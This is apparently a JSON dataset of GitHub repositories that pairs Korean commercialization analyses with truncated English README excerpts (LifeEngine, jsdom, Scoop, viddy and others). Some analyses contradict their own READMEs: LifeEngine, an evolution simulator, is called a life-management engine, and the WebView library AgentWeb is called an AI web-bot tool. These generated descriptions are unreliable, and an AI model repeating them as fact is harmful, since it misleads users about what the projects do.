Clover and others](why-oc.md)\n\nThis guide specifically focuses on two main things:\n\n* Installing macOS on an X86-based PC\n* Teaching you what","composite_score":0.0729,"license_safety_tag":"unknown"},{"name":"MaxRobinsonTheGreat/LifeEngine","github_url":"https://github.com/MaxRobinsonTheGreat/LifeEngine","stars":5,"language":"JavaScript","license":"GPL-3.0","abandonment_months":4,"description":"# LifeEngine 저장소 분석\n\n## 왜 보물인가\n'인생 시뮬레이션' 또는 '생활 관리' 엔진으로, 사람들의 일상을 더 효율적으로 계획하고 추적할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 생활 관리 SaaS**: 월간 구독형 웹/앱 서비스로 사용자들의 목표 달성, 습관 형성, 시간 관리를 자동화\n2. **기업 직원 웰빙 플랫","readme_excerpt":"This is the readme for my evolution simulator, The Life Engine. \n\nFOR FEATURE REQUESTS, USE THE DISCUSSIONS TAB. FOR BUG REPORTS, USE THE ISSUES TAB. :)\n\n# The Life Engine\n[Play here!](https://thelifeengine.net/)\n\nThe life engine is a cellular automaton designed to simulate the long term processes of biological evolution. It allows organisms to eat, reproduce, mutate, and adapt.\nUnlike genetic algorithms, the life engine does not manually select the most \"fit\" organism for some given task, but rather allows true natural selection to \nrun its course. Organisms that survive, successfully produce offspring, and out-compete their neighbors naturally propogate througout the environment.\n\nThis is the second version of the [original evolution simulator](https://github.com/MaxRobinsonTheGreat/EvolutionSimulator), which I started in high school.\n\n\n# How to Run and Modify the Code\n - [Install node and npm](https://nodejs.org/en/download/)\n - Download or clone this repository\n - Open a terminal o","composite_score":0.0729,"license_safety_tag":"restricted"},{"name":"pier-cli/pier","github_url":"https://github.com/pier-cli/pier","stars":5,"language":"Rust","license":"MIT","abandonment_months":4,"description":"# Pier CLI 프로젝트 분석\n\n## 왜 보물인가\n개발자들이 반복적인 작업을 자동화하고 생산성을 높일 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀 대상 구독형 자동화 도구로 월간 반복 작업 시간 단축\n2. **내부 업무 도구**: 회사 개발팀의 배포·테스트·관리 프로세스를 자동으로 처리\n3. **API ","readme_excerpt":"# **pier** ~ A CLI to organize and run short Unix shell scripts\n[![Build Status](https://github.com/pier-cli/pier/actions/workflows/ci.yml/badge.svg)](https://github.com/pier-cli/pier/actions/workflows/ci.yml)\n![crates.io](https://img.shields.io/crates/v/pier.svg)\n\nA central repository to manage all your one-liners, scripts, tools, and CLIs. Add, remove, list, and run scripts - storing metadata to easily find them later. No more digging through your `bin` folder...\n\n![Boat pier](https://raw.githubusercontent.com/BenSchZA/pier/master/.media/boat-dock.png)\n\n## Description\n\nIf you've spent any amount of time in the terminal you no doubt have built up a lovely collection of one-liners, scripts, useful tools, and CLIs. Whenever you want to use them you dig through your `bin` folder trying to remember what you called the script... Linux users love hard-to-remember naming conventions.\n\nScripts should be first-class citizens. In a GUI world we can find our programs using a menu of sorts. In th","composite_score":0.0728,"license_safety_tag":"safe"},{"name":"ellisonleao/magictools","github_url":"https://github.com/ellisonleao/magictools","stars":6,"language":"Markdown","license":"mit","abandonment_months":2,"description":"# magictools 상용화 분석\n\n## 왜 보물인가\n게임 개발자나 디자이너가 필요한 도구들을 한 곳에서 찾을 수 있는 큐레이션된 리소스 모음으로, 산업 커뮤니티에서 필요로 하는 정보 집약지입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 플랫폼 SaaS**: 인디 게임 개발자들이 구독 형식으로 엄선된 도구와 자산에 접근하는 월간 구독 서비스\n2. ","readme_excerpt":"<h1 align=\"center\">\n    <img width=\"900\" src=\"https://cdn.rawgit.com/ellisonleao/magictools/7d8012bc/magicbg.jpg\" alt=\"logo\"/>\n</h1>\n<hr/>\n\n<p align=\"center\">\n    <a href=\"https://github.com/sindresorhus/awesome\"><img src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\" alt=\"Awesome\"/></a>\n    <a href=\"#\"><img src=\"https://github.com/ellisonleao/magictools/actions/workflows/validate-links.yml/badge.svg\" alt=\"build\"/></a>\n</p>\n\nA curated list of game development resources to make **magic** happen.\n\n### License Legends\n\n- :free: - Free\n- :tada: - Open Source\n- :moneybag: - Paid\n- :money_with_wings: - Partially Free\n\n## Table of Contents\n\n- [Graphics](#graphics)\n  - [Assets/Placeholders](#assetsplaceholders)\n  - [Spritesheet Tools](#spritesheet-tools)\n  - [Bitmap Compression](#bitmap-compression)\n  - [Texture Tools](#texture-tools)\n  - [Character Generators](#character-generators)\n  - [Tile/Level Editors](#tilelevel-editors)\n  - [Anima","composite_score":0.0727,"license_safety_tag":"safe"},{"name":"juewuy/ShellClash","github_url":"https://github.com/juewuy/ShellClash","stars":5,"language":"Shell","license":"GPL-3.0","abandonment_months":0,"description":"# ShellClash 사업화 분석\n\n## 왜 보물인가\n인터넷 연결을 더 자유롭고 빠르게 만들어주는 핵심 기술로, 개인과 기업 모두에게 필요한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. VPN/프록시 서비스 SaaS**\n일반 사용자들이 월구독으로 쉽게 사용할 수 있는 웹 기반 인터넷 보안 서비스로 패키징하여 판매\n\n**2. 기업 내부 네트워크 도구*","readme_excerpt":"<h1 align=\"center\">ShellCrash</h1>\n\n<p align=\"center\">\n  <a target=\"_blank\" href=\"https://github.com/MetaCubeX/mihomo/releases\">\n    <img src=\"https://img.shields.io/github/release/MetaCubeX/mihomo.svg?style=flat-square&label=Core\">\n  </a>\n  <a target=\"_blank\" href=\"https://github.com/juewuy/ShellCrash/releases\">\n    <img src=\"https://img.shields.io/github/release/juewuy/ShellCrash.svg?style=flat-square&label=ShellCrash&colorB=green\">\n  </a>\n</p>\n\n<p align=\"center\">\n  <strong>A powerful script tool for the convenient deployment and management of mihomo/sing-box kernels in Shell environments.</strong>\n</p>\n\n<p align=\"center\">\n  <a href=\"README_CN.md\">简体中文</a> | English\n</p>\n\n---\n\n## :rocket: Core Features\n\n- **Multi-Kernel Support**: Easily manage and switch between **mihomo** and **sing-box** kernels directly within the Shell environment.\n- **Flexible Configuration Management**: Supports online import of subscription links and configuration files to simplify the setup process.\n- **Auto","composite_score":0.0727,"license_safety_tag":"restricted"},{"name":"sachaos/viddy","github_url":"https://github.com/sachaos/viddy","stars":8,"language":"Rust","license":"MIT","abandonment_months":4,"description":"# sachaos/viddy 상용화 분석\n\n## 왜 보물인가\n복잡한 명령어 실행 결과를 시각적으로 쉽게 모니터링할 수 있는 도구로, 기술자들의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 시스템 관리자나 개발자를 위한 웹 기반 실시간 모니터링 플랫폼\n2. **내부 업무 도구**: 서버 상태 감시, 자동화 작","readme_excerpt":"# Viddy\n\n<p align=\"center\">\n<img src=\"images/logo.png\" width=\"200\" alt=\"viddy\" title=\"viddy\" />\n</p>\n\nModern `watch` command.\n\nViddy well, gopher. Viddy well.\n\n## Demo\n\n<p align=\"center\">\n<img src=\"images/demo.gif\" width=\"100%\" alt=\"viddy\" title=\"viddy\" />\n</p>\n\n## Features\n\n* Basic features of original watch command.\n    * Execute command periodically, and display the result.\n    * color output.\n    * diff highlight.\n* Time machine mode. 😎\n    * Rewind like video.\n    * Go to the past, and back to the future.\n* Look back history.\n    * Save and load history.\n* See output in pager.\n* Vim like keymaps.\n* Search text.\n* Suspend and restart execution.\n* Support shell alias\n    * See detail https://github.com/sachaos/viddy/issues/2#issuecomment-904002053\n* Customize keymappings.\n* Customize color.\n\n## Install\n\n### Cargo\n\n```shell\ncargo install viddy\n```\n\n### [Homebrew](https://brew.sh)\n\n```shell\nbrew install viddy\n```\n\n### Linux\n\n```shell\nwget -O viddy.tar.gz https://github.com/sachaos/vid","composite_score":0.0725,"license_safety_tag":"safe"},{"name":"googlefonts/compute-shader-101","github_url":"https://github.com/googlefonts/compute-shader-101","stars":46,"language":"Rust","license":"apache-2.0","abandonment_months":4,"description":"# Compute Shader 101 분석\n\n## 왜 보물인가\n컴퓨터 그래픽 처리를 빠르게 하는 핵심 기술을 쉽게 배울 수 있는 교육 자료로, 게임·영상·AI 산업에서 수요가 높은 인재 양성에 직결됩니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 게임 개발이나 그래픽 프로그래밍 강좌를 유료화하여 연수생에게 판매\n2. **기업 내부 교육 ","readme_excerpt":"# Sample code for Compute Shader 101\n\nThis repo contains sample code to help you get started writing applications using compute shaders. It supplements a presentation including a [video](https://www.youtube.com/watch?v=DZRn_jNZjbw) and [slides](https://docs.google.com/presentation/d/1dVSXORW6JurLUcx5UhE1_7EZHuXv8APjx2y_Bbs_1Vg/edit#slide=id.p).\n\nCompute shaders are a promising approach to tap the power of GPU compute in a portable way, but it's not easy to get started. Most real-world usage of compute shaders today is in the context of games, where they do physics simulation, advanced image effects, and more. Games already have infrastructure to connect to the GPU, detect varying levels of capability at runtime, and abstract away details of graphics drivers and shader language translation.\n\nTo some extent compute shaders can be an alternative to CUDA, with a very different set of tradeoffs. The biggest advantage of compute shaders is portability, as they can run on most reasonably rece","composite_score":0.0722,"license_safety_tag":"safe"},{"name":"tmpvar/jsdom","github_url":"https://github.com/tmpvar/jsdom","stars":8,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# tmpvar/jsdom 보물 분석\n\n## 왜 보물인가\n웹 브라우저 환경을 프로그램에서 직접 실행할 수 있게 해주는 도구로, 웹사이트 자동 테스트나 데이터 수집을 비용 효율적으로 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 모니터링 SaaS**\n- 고객사 웹사이트의 문제를 자동으로 감지하고 리포트하는 구독형 서비스\n- 월 [추정] 100","readme_excerpt":"<h1 align=\"center\">\n    <img width=\"100\" height=\"100\" src=\"logo.svg\" alt=\"\"><br>\n    jsdom\n</h1>\n\njsdom is a pure-JavaScript implementation of many web standards, notably the WHATWG [DOM](https://dom.spec.whatwg.org/) and [HTML](https://html.spec.whatwg.org/multipage/) Standards, for use with Node.js. In general, the goal of the project is to emulate enough of a subset of a web browser to be useful for testing and scraping real-world web applications.\n\nThe latest versions of jsdom require newer Node.js versions; see the `package.json` `\"engines\"` field for details.\n\n## Basic usage\n\n```js\nconst jsdom = require(\"jsdom\");\nconst { JSDOM } = jsdom;\n```\n\nTo use jsdom, you will primarily use the `JSDOM` constructor, which is a named export of the jsdom main module. Pass the constructor a string. You will get back a `JSDOM` object, which has a number of useful properties, notably `window`:\n\n```js\nconst dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`);\nconsole.log(dom.window.document.queryS","composite_score":0.0722,"license_safety_tag":"safe"},{"name":"zserge/webview","github_url":"https://github.com/zserge/webview","stars":8,"language":"C++","license":"mit","abandonment_months":3,"description":"# zserge/webview 분석 보고서\n\n## 왜 보물인가\n웹 기술을 사용해 윈도우, 맥, 리눅스 등 모든 운영체제에서 동작하는 가벼운 앱을 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 설치 없이 브라우저에서 접속하는 작업 관리 도구, 회계 관리 시스템 등을 여러 운영체제 사용자에게 동시에 제공\n2. **내부 업","readme_excerpt":"# webview\n\n<a href=\"https://discord.gg/24KMecn\" title=\"Join the chat at Discord\"><img src=\"https://assets-global.website-files.com/6257adef93867e50d84d30e2/636e0b5061df29d55a92d945_full_logo_blurple_RGB.svg\" alt=\"Discord\" height=\"20\" /></a>\n[![Build Status](https://img.shields.io/github/actions/workflow/status/webview/webview/ci.yaml?branch=master)](https://github.com/webview/webview/actions)\n\nA tiny cross-platform webview library for C/C++ to build modern cross-platform GUIs.\n\nThe goal of the project is to create a common HTML5 UI abstraction layer for the most widely used platforms.\n\nIt supports two-way JavaScript bindings (to call JavaScript from C/C++ and to call C/C++ from JavaScript).\n\n> [!NOTE]\n> Language binding for Go [has moved][webview_go]. Versions <= 0.1.1 are available in *this* repository.\n\n## Platform Support\n\nPlatform | Technologies\n-------- | ------------\nLinux    | [GTK][gtk], [WebKitGTK][webkitgtk]\nmacOS    | Cocoa, [WebKit][webkit]\nWindows  | [Windows API][win32-ap","composite_score":0.072,"license_safety_tag":"safe"},{"name":"windowsMarketLab/polymarket-arbitrage-bot-v2","github_url":"https://github.com/windowsMarketLab/polymarket-arbitrage-bot-v2","stars":216,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0715,"license_safety_tag":"unknown"},{"name":"phar-io/manifest","github_url":"https://github.com/phar-io/manifest","stars":9,"language":"PHP","license":"NOASSERTION","abandonment_months":6,"description":"# phar-io/manifest 분석\n\n## 왜 보물인가\nPHP 프로그래밍 언어로 만든 소프트웨어의 구성 정보를 체계적으로 관리하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **PHP 기반 SaaS 서비스**: 웹 애플리케이션의 의존성(필요한 부품) 자동 검사 기능을 제공하는 클라우드 서비스\n2. **개발팀 내부 도구**: 대규모 PHP 프로젝","readme_excerpt":"# Manifest\n\nComponent for reading [phar.io](https://phar.io/) manifest information from a [PHP Archive (PHAR)](http://php.net/phar).\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n    composer require phar-io/manifest\n\nIf you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency:\n\n    composer require --dev phar-io/manifest\n\n## Usage Examples\n\n### Read from `manifest.xml`\n```php\nuse PharIo\\Manifest\\ManifestLoader;\nuse PharIo\\Manifest\\ManifestSerializer;\n\n$manifest = ManifestLoader::fromFile('manifest.xml');\n\nvar_dump($manifest);\n\necho (new ManifestSerializer)->serializeToString($manifest);\n```\n\n<details>\n  <summary>Output</summary>\n    \n```shell\nobject(PharIo\\Manifest\\Manifest)#14 (6) {\n  [\"name\":\"PharIo\\Manifest\\Manifest\":private]=>\n  object(PharIo\\Manifest\\ApplicationName)#10 (1) {\n    [\"name\":\"PharIo\\M","composite_score":0.0714,"license_safety_tag":"unknown"},{"name":"AndyFul/ConfigureDefender","github_url":"https://github.com/AndyFul/ConfigureDefender","stars":9,"language":"","license":"NOASSERTION","abandonment_months":6,"description":"# ConfigureDefender 저장소 분석\n\n## 왜 보물인가\n컴퓨터 바이러스 방어 프로그램(Windows Defender)의 설정을 자동으로 최적화해주는 도구로, 일반 사용자도 복잡한 보안 설정을 쉽게 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 관리 SaaS**: 중소기업의 수백 대 직원 컴퓨터 보안 설정을 한 번에 관리하는","readme_excerpt":"\n\n# ConfigureDefender stable version 4.1.0.0 - December 2025\nhttps://github.com/AndyFul/ConfigureDefender/raw/master/ConfigureDefender.exe\n\n## Overview\nConfigureDefender is a small utility for configuring Windows 10/11 (and Windows Server) built-in Defender Anti-Virus settings. It is a part of the Hard_Configurator project (including source files), but it can be used as a standalone application (portable).\n\n#### ConfigureDefender sources\nhttps://github.com/AndyFul/Hard_Configurator/tree/master/src/\n\n\n## Useful links\nhttps://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide\n\nhttps://medium.com/palantir/microsoft-defender-attack-surface-reduction-recommendations-a5c7d41c3cf8\n\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction\n\nhttps://techcommunity.microsoft.com/tag/Demystifying%20ASR%20rules?nodeId=board%3AMicrosoftDefenderATPBlog\n\n\n## Installatio","composite_score":0.0713,"license_safety_tag":"unknown"},{"name":"jsdom/jsdom","github_url":"https://github.com/jsdom/jsdom","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# jsdom 저장소 분석\n\n## 왜 보물인가\n웹브라우저의 동작을 컴퓨터 프로그램으로 자동으로 모사할 수 있게 해주는 도구로, 웹사이트 자동 테스트나 데이터 수집에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹사이트 자동 테스트 SaaS**: 기업의 웹사이트가 제대로 작동하는지 자동으로 확인해주는 월구독 서비스\n2. **웹데이터 수집 API**: ","readme_excerpt":"<h1 align=\"center\">\n    <img width=\"100\" height=\"100\" src=\"logo.svg\" alt=\"\"><br>\n    jsdom\n</h1>\n\njsdom is a pure-JavaScript implementation of many web standards, notably the WHATWG [DOM](https://dom.spec.whatwg.org/) and [HTML](https://html.spec.whatwg.org/multipage/) Standards, for use with Node.js. In general, the goal of the project is to emulate enough of a subset of a web browser to be useful for testing and scraping real-world web applications.\n\nThe latest versions of jsdom require newer Node.js versions; see the `package.json` `\"engines\"` field for details.\n\n## Basic usage\n\n```js\nconst jsdom = require(\"jsdom\");\nconst { JSDOM } = jsdom;\n```\n\nTo use jsdom, you will primarily use the `JSDOM` constructor, which is a named export of the jsdom main module. Pass the constructor a string. You will get back a `JSDOM` object, which has a number of useful properties, notably `window`:\n\n```js\nconst dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`);\nconsole.log(dom.window.document.queryS","composite_score":0.0713,"license_safety_tag":"safe"},{"name":"github/gov-takedowns","github_url":"https://github.com/github/gov-takedowns","stars":8,"language":"","license":"unknown","abandonment_months":0,"description":"","readme_excerpt":"#### What is this?\nFrom time to time, GitHub receives requests from governments to remove content that has been declared unlawful in their local jurisdiction. Although we may not always agree with those laws, we may need to block content if we receive a complete request from a government official so that our users in that jurisdiction may continue to have access to GitHub to collaborate and build software. This repository contains official government requests which led to content removal based on local law.\n\n#### What is a complete government takedown request?\nTo count as a complete request, a request or notice must\n- come from a relevant, official government agency\n- identify illegal content\n- specify the source of illegality in that jurisdiction (law or court order).\n\n#### What happens when we receive a complete takedown request from a government?\n\nWhen we receive a notice from a relevant, official government agency that identifies illegal content and specifies the source of the ille","composite_score":0.0711,"license_safety_tag":"unknown"},{"name":"hellerve/programming-talks","github_url":"https://github.com/hellerve/programming-talks","stars":10,"language":"Python","license":"unknown","abandonment_months":3,"description":"# programming-talks 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 사람들을 위해 유명 개발자들의 강연과 교육 자료를 한 곳에 모아놓은 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 프로그래밍 초보자를 위한 강의 추천 서비스로 구독료를 받고 엄선된 영상 제공\n2. **기업 교육 도구**: IT","readme_excerpt":"# Programming Talks\n\nI watch a lot of talks that I love to share with my friends, fellows and coworkers.\nAs I consider all GitHubbers my friends (oh yeah!), I decided it's time to share the\nlist.\n\nThere are talks on programming language specifics as well as a more general section I call \"theory\".\nBut don't expect to always get theoretical computer science for every talk there;\nmost of them are on the architecture and design of software.\n\nI welcome every contribution to the list; for guidelines look [below](#contributing).\n\n**Disclaimer:** I did not give any of the talks on the list and am responsible neither\nfor their content nor for their presentation. All links below will direct you to\nexternal sites (mostly YouTube, really), be aware of that. If you are one of the people\nresponsible for the talks or the platform presenting it and want it removed,\ntell me and I'll sort it out with you.\n\n**[A]** after a talk name denotes a talk that *someone* thought could be listened to as audio, wit","composite_score":0.0711,"license_safety_tag":"unknown"},{"name":"robmarkcole/satellite-image-deep-learning","github_url":"https://github.com/robmarkcole/satellite-image-deep-learning","stars":14,"language":"","license":"Apache-2.0","abandonment_months":1,"description":"# 위성 이미지 딥러닝 분석 저장소 평가\n\n## 왜 보물인가\n하늘에서 촬영한 사진으로 땅의 변화(건설, 재난, 환경 오염 등)를 자동으로 감지하는 기술로, 현장 조사 없이도 광범위한 지역을 빠르게 모니터링할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 건설사·정부 고객을 위한 \"건설 진행률 자동 추적 웹 서비스\" - 시공 현장의","readme_excerpt":"<div align=\"center\">\n  <p>\n    <a href=\"https://www.satellite-image-deep-learning.com/\">\n        <img src=\"images/logo.png\" width=\"700\">\n    </a>\n</p>\n\n# 👉 [satellite-image-deep-learning.com](https://www.satellite-image-deep-learning.com/) 👈\n\n</div>\n\n## Introduction\n\nDeep learning has revolutionized the analysis and interpretation of satellite and aerial imagery, addressing unique challenges such as vast image sizes and a wide array of object classes. This repository provides an exhaustive overview of deep learning techniques specifically tailored for satellite and aerial image processing. It covers a range of architectures, models, and algorithms suited for key tasks like classification, segmentation, and object detection.\n\n**How to use this repository:** use `Command + F` (Mac) or `CTRL + F` (Windows) to search this page for e.g. 'SAM'\n\n## Techniques\n\n- [Classification](https://github.com/satellite-image-deep-learning/techniques?tab=readme-ov-file#classification)\n- [Segmentation](htt","composite_score":0.0706,"license_safety_tag":"safe"},{"name":"Justson/AgentWeb","github_url":"https://github.com/Justson/AgentWeb","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# AgentWeb 상용화 분석\n\n## 왜 보물인가\n웹사이트를 자동으로 제어하고 정보를 수집하는 AI 봇을 쉽게 만들 수 있는 도구로, 반복적인 웹 작업 자동화의 번거로움을 없애줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 가격 모니터링 SaaS**\n- 경쟁사 웹사이트에서 자동으로 가격을 수집하고 고객에게 알려주는 구독 서비스\n\n**2. 부동산 정보 수집 ","readme_excerpt":"\n<div style=\"display: flex;flex-direction: row;justify-content: center\" width=\"100%\">\n      <img src=\"./img/logo.png\"></img>\n</div>\n\n## AgentWeb 介绍\n\nAgentWeb 是一个基于的 Android WebView ，极度容易使用以及功能强大的库，提供了 Android WebView 一系列的问题解决方案 ，并且轻量和极度灵活，详细使用请参照上面的 Sample 。\n\t\n\n## Gradle 引入\n\n```groovy\nallprojects {\n  repositories {\n    mavenCentral()\n    maven { url 'https://jitpack.io' }\n  }\n}\n```\n\n\n\n* Androidx\n\n   ```groovy\n    implementation 'io.github.justson:agentweb-core:v5.1.1-androidx' \n    implementation 'io.github.justson:agentweb-filechooser:v5.1.1-androidx' // (可选)\n    implementation 'com.github.Justson:Downloader:v5.0.4-androidx' // (可选)\n   \n   ```\n\n\n## 相关\n* [flying-pigeon跨进程IPC组件](https://github.com/Justson/flying-pigeon)\n* [AgentWebX5](https://github.com/Justson/AgentWebX5)\n* [WebView 进度条](https://github.com/Justson/CoolIndicator)\n* [Downloader 一个轻量的文件下载器](https://github.com/Justson/Downloader)\n\n\t\n\n\n## 注意事项\n* 支付宝使用需要引入支付宝SDK ，并在项目中依赖 ， 微信支付不需要做任何操作。\n* AgentWeb 内部使用了 `AlertDialog` 需要依赖 `A","composite_score":0.0705,"license_safety_tag":"safe"},{"name":"barryvdh/laravel-debugbar","github_url":"https://github.com/barryvdh/laravel-debugbar","stars":10,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Laravel Debugbar 프로젝트 분석\n\n## 왜 보물인가\n웹사이트 개발자들이 자신이 만든 페이지의 오류를 빠르게 찾고 고칠 수 있도록 도와주는 필수 진단 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 교육 플랫폼**: 초급 개발자들이 코드 오류를 시각적으로 이해하고 학습할 수 있는 기능 포함\n2. **웹사이트 개발 대행사의 내부 도구","readme_excerpt":"## Debugbar for Laravel\n\n![Unit Tests](https://github.com/fruitcake/laravel-debugbar/workflows/Unit%20Tests/badge.svg)\n[![Packagist License](https://img.shields.io/badge/Licence-MIT-blue)](https://choosealicense.com/licenses/mit)\n[![Latest Stable Version](https://img.shields.io/packagist/v/fruitcake/laravel-debugbar?label=Stable)](https://packagist.org/packages/fruitcake/laravel-debugbar)\n[![Total Downloads](https://img.shields.io/packagist/dt/barryvdh/laravel-debugbar?label=Downloads)](https://packagist.org/packages/fruitcake/laravel-debugbar)\n[![Fruitcake](https://img.shields.io/badge/Powered%20By-Fruitcake-b2bc35.svg)](https://fruitcake.nl)\n\nThis is a package to integrate [PHP Debug Bar](https://github.com/php-debugbar/php-debugbar) with Laravel.\nIt includes a ServiceProvider to register the debugbar and attach it to the output. You can publish assets and configure it through Laravel.\nIt bootstraps some Collectors to work with Laravel and implements a couple custom DataCollectors, s","composite_score":0.0705,"license_safety_tag":"safe"},{"name":"jhalterman/failsafe","github_url":"https://github.com/jhalterman/failsafe","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":5,"description":"# Failsafe 저장소 분석\n\n## 왜 보물인가\n온라인 서비스가 갑자기 먹통이 되어도 자동으로 재시도하거나 대체 방법을 찾아주는 \"안전장치\" 같은 기술이라, 신뢰할 수 있는 서비스를 만들려는 모든 회사에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **결제 SaaS**: 신용카드 결제가 실패해도 자동으로 다시 시도하여 결제 성공률을 95% 이상으로 높","readme_excerpt":"# Failsafe\n\n[![Build Status](https://github.com/failsafe-lib/failsafe/workflows/build/badge.svg)](https://github.com/failsafe-lib/failsafe/actions)\n[![Maven Central](https://img.shields.io/maven-central/v/dev.failsafe/failsafe.svg?maxAge=60&colorB=53C92E)](https://maven-badges.herokuapp.com/maven-central/dev.failsafe/failsafe)\n[![License](http://img.shields.io/:license-apache-brightgreen.svg)](http://www.apache.org/licenses/LICENSE-2.0.html)\n[![Slack](https://img.shields.io/badge/slack-failsafe-brightgreen.svg?logo=slack)](https://failsafe-lib.slack.com)\n[![JavaDoc](https://img.shields.io/maven-central/v/dev.failsafe/failsafe.svg?maxAge=60&label=javadoc)](https://failsafe.dev/javadoc/core)\n\nFailsafe is a lightweight, zero-dependency library for handling failures in Java 8+, with a concise API for handling everyday use cases and the flexibility to handle everything else. It works by wrapping executable logic with one or more resilience policies, which can be combined and composed as nee","composite_score":0.0704,"license_safety_tag":"safe"},{"name":"lukesampson/scoop","github_url":"https://github.com/lukesampson/scoop","stars":6,"language":"PowerShell","license":"unlicense","abandonment_months":1,"description":"# Scoop 저장소 분석\n\n## 왜 보물인가\nWindows 사용자가 간단한 명령어로 필요한 프로그램을 자동으로 설치하고 관리할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **IT 회사 내부 도구**: 신입 직원 온보딩 시 필요한 개발 환경을 한 번에 자동 설정하는 자동화 솔루션\n2. **SaaS 플랫폼**: 중소 기업의 IT 관리자가 직","readme_excerpt":"<h1 align=\"center\">Scoop</h1>\n\n<!--<img src=\"scoop.png\" alt=\"Long live Scoop!\"/>-->\n<p align=\"center\">\n        <a href=\"https://github.com/ScoopInstaller/Scoop#what-does-scoop-do\">Features</a>\n        |\n        <a href=\"https://github.com/ScoopInstaller/Scoop#installation\">Installation</a>\n        |\n        <a href=\"https://github.com/ScoopInstaller/Scoop/wiki\">Documentation</a>\n</p>\n\n---\n\n<p align=\"center\">\n    <a href=\"https://github.com/ScoopInstaller/Scoop\">\n        <img src=\"https://img.shields.io/github/languages/code-size/ScoopInstaller/Scoop.svg\" alt=\"Code Size\" />\n    </a>\n    <a href=\"https://github.com/ScoopInstaller/Scoop\">\n        <img src=\"https://img.shields.io/github/repo-size/ScoopInstaller/Scoop.svg\" alt=\"Repository size\" />\n    </a>\n    <a href=\"https://github.com/ScoopInstaller/Scoop/actions/workflows/ci.yml\">\n        <img src=\"https://github.com/ScoopInstaller/Scoop/actions/workflows/ci.yml/badge.svg\" alt=\"Scoop Core CI Tests\" />\n    </a>\n    <a href=\"https://disco","composite_score":0.0704,"license_safety_tag":"unknown"},{"name":"niuhuan/pikapi-flutter","github_url":"https://github.com/niuhuan/pikapi-flutter","stars":9,"language":"Dart","license":"MIT","abandonment_months":3,"description":"# pikapi-flutter 저장소 분석\n\n## 왜 보물인가\n스마트폰에서 사용할 수 있는 만화 읽기 앱을 직접 만들 수 있는 기술로, 기존 앱 개발보다 훨씬 빠르고 저렴하게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 만화 플랫폼 운영사가 자체 모바일 앱을 제작·운영하는 서비스\n- **내부 업무 도구**: 출판사·웹툰 제작","readme_excerpt":"<div align=\"center\">\n  <h1 align=\"center\">\n    Pikapika \n\n[![license](https://img.shields.io/github/license/ComicSparks/pikapika)](https://raw.githubusercontent.com/ComicSparks/pikapika/master/LICENSE)\n[![releases](https://img.shields.io/github/v/release/ComicSparks/pikapika)](https://github.com/ComicSparks/pikapika/releases)\n  </h1>\n</div>\n\n- A visually appealing, easy-to-use, ad-free manga client that runs on Windows/MacOS/Linux/Android/iOS.\n- This app contains restricted content (such as explicit, gory, violent, drug-related scenes). Users under 18 should use it under parental supervision, and please comply with local laws and regulations.\n- Your stars and issues are a great encouragement to the developers. You can download the latest source code/installation package from the source repository to show support/offer suggestions.\n- Source Repository URL is [https://github.com/ComicSparks/pikapika](https://github.com/ComicSparks/pikapika)\n\n## Interface / Functions\n\n![reader](images/rea","composite_score":0.0703,"license_safety_tag":"safe"},{"name":"sindresorhus/refined-github","github_url":"https://github.com/sindresorhus/refined-github","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Refined GitHub 분석\n\n## 왜 보물인가\n깃허브(개발자들이 사용하는 협업 플랫폼)를 더 쉽고 빠르게 쓸 수 있게 개선해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀을 위한 브라우저 확장 프로그램으로 월 구독료 받기\n2. **내부 업무 도구**: 기업의 개발팀이 자체 깃허브를 더 효율적으로 관리하도록 커스터마","readme_excerpt":"# <img src=\"source/icon.png\" width=\"45\" align=\"left\"> Refined GitHub\n\n> Browser extension that simplifies the GitHub interface and adds useful features\n\nWe use GitHub a lot and notice many annoyances we'd like to fix. So here be dragons.\n\nOur hope is that GitHub will notice and implement some of these much-needed improvements. So if you like any of these improvements, please open a discussion on [GitHub feedback](https://github.com/github-community/community/discussions) or contact [GitHub support](https://support.github.com/request) about doing it.\n\nGitHub Enterprise is also supported: [How to enable 